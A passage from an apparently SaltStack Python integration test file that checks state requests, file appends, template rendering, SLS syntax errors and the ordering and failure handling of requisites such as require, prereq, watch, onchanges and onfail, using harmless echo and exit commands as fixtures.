'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.clear_request')
self.assertTrue(ret)
def test_run_request_succeeded(self):
'''
verify running a state request sent to the minion(s)
'''
self._remove_request_cache_file()
if salt.utils.platform.is_windows():
self.run_function('state.request', mods='modules.state.requested_win')
else:
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.run_request')
if salt.utils.platform.is_windows():
key = 'cmd_|-count_root_dir_contents_|-Get-ChildItem C:\\\\ | Measure-Object | %{$_.Count}_|-run'
else:
key = 'cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run'
result = ret[key]['result']
self.assertTrue(result)
def test_run_request_failed_no_request_staged(self):
'''
verify not running a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
self.run_function('state.clear_request')
ret = self.run_function('state.run_request')
self.assertEqual(ret, {})
def test_issue_1896_file_append_source(self):
'''
Verify that we can append a file's contents
'''
testfile = os.path.join(TMP, 'test.append')
if os.path.isfile(testfile):
os.unlink(testfile)
ret = self.run_function('state.sls', mods='testappend')
self.assertSaltTrueReturn(ret)
ret = self.run_function('state.sls', mods='testappend.step-1')
self.assertSaltTrueReturn(ret)
ret = self.run_function('state.sls', mods='testappend.step-2')
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
testfile_contents = salt.utils.stringutils.to_unicode(fp_.read())
contents = textwrap.dedent('''\
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# enable bash completion in interactive shells
if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
. /etc/bash_completion
fi
''')
if salt.utils.platform.is_windows():
new_contents = contents.splitlines()
contents = os.linesep.join(new_contents)
contents += os.linesep
self.assertMultiLineEqual(
contents, testfile_contents)
# Re-append switching order
ret = self.run_function('state.sls', mods='testappend.step-2')
self.assertSaltTrueReturn(ret)
ret = self.run_function('state.sls', mods='testappend.step-1')
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
testfile_contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(contents, testfile_contents)
def test_issue_1876_syntax_error(self):
'''
verify that we catch the following syntax error::
/tmp/salttest/issue-1876:
file:
- managed
- source: salt://testfile
file.append:
- text: foo
'''
testfile = os.path.join(TMP, 'issue-1876')
sls = self.run_function('state.sls', mods='issue-1876')
self.assertIn(
'ID \'{0}\' in SLS \'issue-1876\' contains multiple state '
'declarations of the same type'.format(testfile),
sls
)
def test_issue_1879_too_simple_contains_check(self):
expected = textwrap.dedent('''\
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# enable bash completion in interactive shells
if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
. /etc/bash_completion
fi
''')
if salt.utils.platform.is_windows():
new_contents = expected.splitlines()
expected = os.linesep.join(new_contents)
expected += os.linesep
testfile = os.path.join(TMP, 'issue-1879')
# Delete if exiting
if os.path.isfile(testfile):
os.unlink(testfile)
# Create the file
ret = self.run_function('state.sls', mods='issue-1879', timeout=120)
self.assertSaltTrueReturn(ret)
# The first append
ret = self.run_function(
'state.sls', mods='issue-1879.step-1', timeout=120
)
self.assertSaltTrueReturn(ret)
# The second append
ret = self.run_function(
'state.sls', mods='issue-1879.step-2', timeout=120
)
self.assertSaltTrueReturn(ret)
# Does it match?
try:
with salt.utils.files.fopen(testfile, 'r') as fp_:
contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(expected, contents)
# Make sure we don't re-append existing text
ret = self.run_function(
'state.sls', mods='issue-1879.step-1', timeout=120
)
self.assertSaltTrueReturn(ret)
ret = self.run_function(
'state.sls', mods='issue-1879.step-2', timeout=120
)
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(expected, contents)
except Exception:
if os.path.exists(testfile):
shutil.copy(testfile, testfile + '.bak')
raise
finally:
if os.path.exists(testfile):
os.unlink(testfile)
def test_include(self):
tempdir = tempfile.mkdtemp(dir=TMP)
self.addCleanup(shutil.rmtree, tempdir, ignore_errors=True)
pillar = {}
for path in ('include-test', 'to-include-test', 'exclude-test'):
pillar[path] = os.path.join(tempdir, path)
ret = self.run_function('state.sls', mods='include-test', pillar=pillar)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(pillar['include-test']))
self.assertTrue(os.path.isfile(pillar['to-include-test']))
self.assertFalse(os.path.isfile(pillar['exclude-test']))
def test_exclude(self):
tempdir = tempfile.mkdtemp(dir=TMP)
self.addCleanup(shutil.rmtree, tempdir, ignore_errors=True)
pillar = {}
for path in ('include-test', 'exclude-test', 'to-include-test'):
pillar[path] = os.path.join(tempdir, path)
ret = self.run_function('state.sls', mods='exclude-test', pillar=pillar)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(pillar['include-test']))
self.assertTrue(os.path.isfile(pillar['exclude-test']))
self.assertFalse(os.path.isfile(pillar['to-include-test']))
@skipIf(salt.utils.path.which_bin(KNOWN_BINARY_NAMES) is None, 'virtualenv not installed')
def test_issue_2068_template_str(self):
venv_dir = os.path.join(
TMP, 'issue-2068-template-str'
)
try:
ret = self.run_function(
'state.sls', mods='issue-2068-template-str-no-dot',
timeout=120
)
self.assertSaltTrueReturn(ret)
finally:
if os.path.isdir(venv_dir):
shutil.rmtree(venv_dir)
# Let's load the template from the filesystem. If running this state
# with state.sls works, so should using state.template_str
template_path = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
'files', 'file', 'base', 'issue-2068-template-str-no-dot.sls'
)
with salt.utils.files.fopen(template_path, 'r') as fp_:
template = salt.utils.stringutils.to_unicode(fp_.read())
ret = self.run_function(
'state.template_str', [template], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now using state.template
ret = self.run_function(
'state.template', [template_path], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now the problematic #2068 including dot's
ret = self.run_function(
'state.sls', mods='issue-2068-template-str', timeout=120
)
self.assertSaltTrueReturn(ret)
# Let's load the template from the filesystem. If running this state
# with state.sls works, so should using state.template_str
template_path = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
'files', 'file', 'base', 'issue-2068-template-str.sls'
)
with salt.utils.files.fopen(template_path, 'r') as fp_:
template = salt.utils.stringutils.to_unicode(fp_.read())
ret = self.run_function(
'state.template_str', [template], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now using state.template
ret = self.run_function(
'state.template', [template_path], timeout=120
)
self.assertSaltTrueReturn(ret)
def test_template_invalid_items(self):
TEMPLATE = textwrap.dedent('''\
{0}:
- issue-2068-template-str
/tmp/test-template-invalid-items:
file:
- managed
- source: salt://testfile
''')
for item in ('include', 'exclude', 'extends'):
ret = self.run_function(
'state.template_str', [TEMPLATE.format(item)]
)
self.assertTrue(isinstance(ret, list))
self.assertNotEqual(ret, [])
self.assertEqual(
['The \'{0}\' declaration found on \'<template-str>\' is '
'invalid when rendering single templates'.format(item)],
ret
)
def test_pydsl(self):
'''
Test the basics of the pydsl
'''
ret = self.run_function('state.sls', mods='pydsl-1')
self.assertSaltTrueReturn(ret)
def test_issues_7905_and_8174_sls_syntax_error(self):
'''
Call sls file with yaml syntax error.
Ensure theses errors are detected and presented to the user without
stack traces.
'''
ret = self.run_function('state.sls', mods='syntax.badlist')
self.assertEqual(ret, [
'State \'A\' in SLS \'syntax.badlist\' is not formed as a list'
])
ret = self.run_function('state.sls', mods='syntax.badlist2')
self.assertEqual(ret, [
'State \'C\' in SLS \'syntax.badlist2\' is not formed as a list'
])
def test_requisites_mixed_require_prereq_use(self):
'''
Call sls file containing several requisites.
'''
expected_simple_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True}
}
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo B third" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True}
}
expected_req_use_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 1,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 4,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 5,
'comment': 'Command "echo D" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E_|-run': {
'__run_num__': 2,
'comment': 'Command "echo E" run',
'result': True,
'changes': True},
'cmd_|-F_|-echo F_|-run': {
'__run_num__': 3,
'comment': 'Command "echo F" run',
'result': True,
'changes': True}
}
ret = self.run_function('state.sls', mods='requisites.mixed_simple')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_simple_result, result)
# test Traceback recursion prereq+require #8785
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error2')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# test Infinite recursion prereq+require #8785 v2
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error3')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# test Infinite recursion prereq+require #8785 v3
# TODO: this is actually failing badly, and expected result is maybe not a recursion
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error4')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# undetected infinite loopS prevents this test from running...
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.mixed_complex1')
#result = self.normalize_ret(ret)
#self.assertEqual(expected_result, result)
def test_watch_in(self):
'''
test watch_in requisite when there is a success
'''
ret = self.run_function('state.sls', mods='requisites.watch_in')
changes = 'test_|-return_changes_|-return_changes_|-succeed_with_changes'
watch = 'test_|-watch_states_|-watch_states_|-succeed_without_changes'
self.assertEqual(ret[changes]['__run_num__'], 0)
self.assertEqual(ret[watch]['__run_num__'], 2)
self.assertEqual('Watch statement fired.', ret[watch]['comment'])
self.assertEqual('Something pretended to change',
ret[changes]['changes']['testing']['new'])
def test_watch_in_failure(self):
'''
test watch_in requisite when there is a failure
'''
ret = self.run_function('state.sls', mods='requisites.watch_in_failure')
fail = 'test_|-return_changes_|-return_changes_|-fail_with_changes'
watch = 'test_|-watch_states_|-watch_states_|-succeed_without_changes'
self.assertEqual(False, ret[fail]['result'])
self.assertEqual('One or more requisite failed: requisites.watch_in_failure.return_changes',
ret[watch]['comment'])
def normalize_ret(self, ret):
'''
Normalize the return to the format that we'll use for result checking
'''
result = {}
for item, descr in six.iteritems(ret):
result[item] = {
'__run_num__': descr['__run_num__'],
'comment': descr['comment'],
'result': descr['result'],
'changes': descr['changes'] != {} # whether there where any changes
}
return result
def test_requisites_require_ordering_and_errors(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo C third" run',
'result': True,
'changes': True,
},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True,
},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True,
},
'cmd_|-F_|-echo F_|-run': {
'__run_num__': 5,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' foobar: A\n',
'result': False,
'changes': False,
},
'cmd_|-G_|-echo G_|-run': {
'__run_num__': 6,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False,
},
'cmd_|-H_|-echo H_|-run': {
'__run_num__': 7,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False,
}
}
ret = self.run_function('state.sls', mods='requisites.require')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
ret = self.run_function('state.sls', mods='requisites.require_error1')
self.assertEqual(ret, [
"Cannot extend ID 'W' in 'base:requisites.require_error1'. It is not part of the high state.\nThis is likely due to a missing include statement or an incorrectly typed ID.\nEnsure that a state with an ID of 'W' is available\nin environment 'base' and to SLS 'requisites.require_error1'"
])
# issue #8235
# FIXME: Why is require enforcing list syntax while require_in does not?
# And why preventing it?
# Currently this state fails, should return C/B/A
result = {}
ret = self.run_function('state.sls', mods='requisites.require_simple_nolist')
self.assertEqual(ret, [
'The require statement in state \'B\' in SLS '
+ '\'requisites.require_simple_nolist\' needs to be formed as a list'
])
# commented until a fix is made for issue #8772
# TODO: this test actually fails
#ret = self.run_function('state.sls', mods='requisites.require_error2')
#self.assertEqual(ret, [
# 'Cannot extend state foobar for ID A in "base:requisites.require_error2".'
# + ' It is not part of the high state.'
#])
ret = self.run_function('state.sls', mods='requisites.require_recursion_error1')
self.assertEqual(
ret,
['A recursive requisite was found, SLS "requisites.require_recursion_error1" ID "B" ID "A"']
)
def test_requisites_require_any(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 3,
'comment': 'Command "echo A" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-/bin/false_|-run': {
'__run_num__': 1,
'comment': 'Command "/bin/false" run',
'result': False,
'changes': True,
},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 2,
'comment': 'Command "echo D" run',
'result': True,
'changes': True,
},
}
ret = self.run_function('state.sls', mods='requisites.require_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_require_any_fail(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
ret = self.run_function('state.sls', mods='requisites.require_any_fail')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertIn('One or more requisite failed',
result['cmd_|-D_|-echo D_|-run']['comment'])
def test_requisites_watch_any(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
if salt.utils.platform.is_windows():
cmd_true = 'exit'
cmd_false = 'exit /B 1'
else:
cmd_true = 'true'
cmd_false = 'false'
expected_result = {
'cmd_|-A_|-{0}_|-wait'.format(cmd_true): {
'__run_num__': 4,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-B_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 0,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-C_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 1,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
'cmd_|-D_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 2,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-E_|-{0}_|-wait'.format(cmd_true): {
'__run_num__': 9,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-F_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 5,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-G_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 6,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
'cmd_|-H_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 7,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
}
ret = self.run_function('state.sls', mods='requisites.watch_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_watch_any_fail(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
ret = self.run_function('state.sls', mods='requisites.watch_any_fail')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertIn('One or more requisite failed',
result['cmd_|-A_|-true_|-wait']['comment'])
def test_requisites_onchanges_any(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-another_changing_state_|-echo "Changed!"_|-run': {
'__run_num__': 1,
'changes': True,
'comment': 'Command "echo "Changed!"" run',
'result': True
},
'cmd_|-changing_state_|-echo "Changed!"_|-run': {
'__run_num__': 0,
'changes': True,
'comment': 'Command "echo "Changed!"" run',
'result': True
},
'cmd_|-test_one_changing_states_|-echo "Success!"_|-run': {
'__run_num__': 4,
'changes': True,
'comment': 'Command "echo "Success!"" run',
'result': True
},
'cmd_|-test_two_non_changing_states_|-echo "Should not run"_|-run': {
'__run_num__': 5,
'changes': False,
'comment': 'State was not run because none of the onchanges reqs changed',
'result': True
},
'pip_|-another_non_changing_state_|-mock_|-installed': {
'__run_num__': 3,
'changes': False,
'comment': 'Python package mock was already installed\nAll packages were successfully installed',
'result': True
},
'pip_|-non_changing_state_|-mock_|-installed': {
'__run_num__': 2,
'changes': False,
'comment': 'Python package mock was already installed\nAll packages were successfully installed',
'result': True
}
}
ret = self.run_function('state.sls', mods='requisites.onchanges_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_onfail_any(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-a_|-exit 0_|-run': {
'__run_num__': 0,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-b_|-exit 1_|-run': {
'__run_num__': 1,
'changes': True,
'comment': 'Command "exit 1" run',
'result': False
},
'cmd_|-c_|-exit 0_|-run': {
'__run_num__': 2,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-d_|-echo itworked_|-run': {
'__run_num__': 3,
'changes': True,
'comment': 'Command "echo itworked" run',
'result': True},
'cmd_|-e_|-exit 0_|-run': {
'__run_num__': 4,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-f_|-exit 0_|-run': {
'__run_num__': 5,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-g_|-exit 0_|-run': {
'__run_num__': 6,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-h_|-echo itworked_|-run': {
'__run_num__': 7,
'changes': False,
'comment': 'State was not run because onfail req did not change',
'result': True
}
}
ret = self.run_function('state.sls', mods='requisites.onfail_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_full_sls(self):
'''
Teste the sls special command in requisites
'''
expected_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
}
ret = self.run_function('state.sls', mods='requisites.fullsls_require')
self.assertReturnNonEmptySaltType(ret)
result = self.normalize_ret(ret)
self.assertEqual(expected_result, result)
# issue #8233: traceback on prereq sls
# TODO: not done
#ret = self.run_function('state.sls', mods='requisites.fullsls_prereq')
#self.assertEqual(['sls command can only be used with require requisite'], ret)
def test_requisites_require_no_state_module(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo C third" run',
'result': True,
'changes': True,
},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True,
},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True,
},
'cmd_|-G_|-echo G_|-run': {
'__run_num__': 5,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' id: Z\n',
'result': False,
'changes': False,
},
'cmd_|-H_|-echo H_|-run': {
'__run_num__': 6,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' id: Z\n',
'result': False,
'changes': False,
}
}
ret = self.run_function('state.sls', mods='requisites.require_no_state_module')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_prereq_simple_ordering_and_errors(self):
'''
Call sls file containing several prereq_in and prereq.
Ensure that some of them are failing and that the order is right.
'''
expected_result_simple = {
'cmd_|-A_|-echo A third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A third" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-I_|-echo I_|-run': {
'__run_num__': 3,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False},
'cmd_|-J_|-echo J_|-run': {
'__run_num__': 4,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: A\n',
'result': False,
'changes': False}
}
expected_result_simple_no_state_module = {
'cmd_|-A_|-echo A third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A third" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-I_|-echo I_|-run': {
'__run_num__': 3,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' id: Z\n',
'result': False,
'changes': False}
}
expected_result_simple2 = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 1,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 2,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 3,
'comment': 'Command "echo D" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E_|-run': {
'__run_num__': 4,
'comment': 'Command "echo E" run',
'result': True,
'changes': True}
}
expected_result_simple3 = {
'cmd_|-A_|-echo A first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo A first" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-wait': {
'__run_num__': 2,
'comment': '',
'result': True,
'changes': False,
}
}
expected_result_complex = {
'cmd_|-A_|-echo A fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo A fourth" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo D third" run',
'result': True,
'changes': True},
}
ret = self.run_function('state.sls', mods='requisites.prereq_simple')
self.assertReturnNonEmptySaltType(ret)
result = self.normalize_ret(ret)
self.assertEqual(expected_result_simple, result)
# same test, but not using lists in yaml syntax
# TODO: issue #8235, prereq ignored when not used in list syntax
# Currently fails badly with :
# TypeError encountered executing state.sls: string indices must be integers, not str.
#expected_result_simple.pop('cmd_|-I_|-echo I_|-run')
#expected_result_simple.pop('cmd_|-J_|-echo J_|-run')
#ret = self.run_function('state.sls', mods='requisites.prereq_simple_nolist')
#result = self.normalize_ret(ret)
#self.assertEqual(expected_result_simple, result)
ret = self.run_function('state.sls', mods='requisites.prereq_simple2')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result_simple2, result)
ret = self.run_function('state.sls', mods='requisites.prereq_simple3')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result_simple3, result)
#ret = self.run_function('state.sls', mods='requisites.prereq_error_nolist')
#self.assertEqual(
# ret,
# ['Cannot extend ID Z in "base:requisites.prereq_error_nolist".'
# + ' It is not part of the high state.']
#)
ret = self.run_function('state.sls', mods='requisites.prereq_compile_error1')
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(
ret['cmd_|-B_|-echo B_|-run']['comment'],
'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: A\n'
)
ret = self.run_function('state.sls', mods='requisites.prereq_compile_error2')
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(
ret['cmd_|-B_|-echo B_|-run']['comment'],
'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: C\n'
)
ret = self.run_function('state.sls', mods='requisites.prereq_complex')
result = self.normalize_ret(ret)
self.assertEqual(expected_result_complex, result)
# issue #8210 : prereq recursion undetected
# TODO: this test fails
#ret = self.run_function('state.sls', mods='requisites.prereq_recursion_error')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_recursion_error" ID "B" ID "A"']
#)
ret = self.run_function('state.sls', mods='requisites.prereq_simple_no_state_module')
result = self.normalize_ret(ret)
self.assertEqual(expected_result_simple_no_state_module, result)
def test_infinite_recursion_sls_prereq(self):
ret = self.run_function('state.sls', mods='requisites.prereq_sls_infinite_recursion')
self.assertSaltTrueReturn(ret)
def test_requisites_use(self):
'''
Call sls file containing several use_in and use.
'''
# TODO issue #8235 & #8774 some examples are still commented in the test file
ret = self.run_function('state.sls', mods='requisites.use')
self.assertReturnNonEmptySaltType(ret)
for item, descr in six.iteritems(ret):
self.assertEqual(descr['comment'], 'onlyif condition is false')
# TODO: issue #8802 : use recursions undetected
# issue is closed as use does not actually inherit requisites
# if chain-use is added after #8774 resolution theses tests would maybe become useful
#ret = self.run_function('state.sls', mods='requisites.use_recursion')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion"'
# + ' ID "B" ID "A"'
#])
#ret = self.run_function('state.sls', mods='requisites.use_recursion2')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion2"'
# + ' ID "C" ID "A"'
#])
#ret = self.run_function('state.sls', mods='requisites.use_auto_recursion')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion"'
# + ' ID "A" ID "A"'
#])
def test_requisites_use_no_state_module(self):
'''
Call sls file containing several use_in and use.
'''
ret = self.run_function('state.sls', mods='requisites.use_no_state_module')
self.assertReturnNonEmptySaltType(ret)
for item, descr in six.iteritems(ret):
self.assertEqual(descr['comment'], 'onlyif condition is false')
def test_get_file_from_env_in_top_match(self):
tgt = os.path.join(TMP, 'prod-cheese-file')
try:
ret = self.run_function(
'state.highstate', minion_tgt='sub_minion'
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(tgt))
with salt.utils.files.fopen(tgt, 'r') as cheese:
data = salt.utils.stringutils.to_unicode(cheese.read())
self.assertIn('Gromit', data)
self.assertIn('Comte', data)
finally:
if os.path.islink(tgt):
os.unlink(tgt)
# onchanges tests
def test_onchanges_requisite(self):
'''
Tests a simple state using the onchanges requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple')
# First, test the result of the state run when changes are expected to happen
test_data = state_run['cmd_|-test_changing_state_|-echo "Success!"_|-run']['comment']
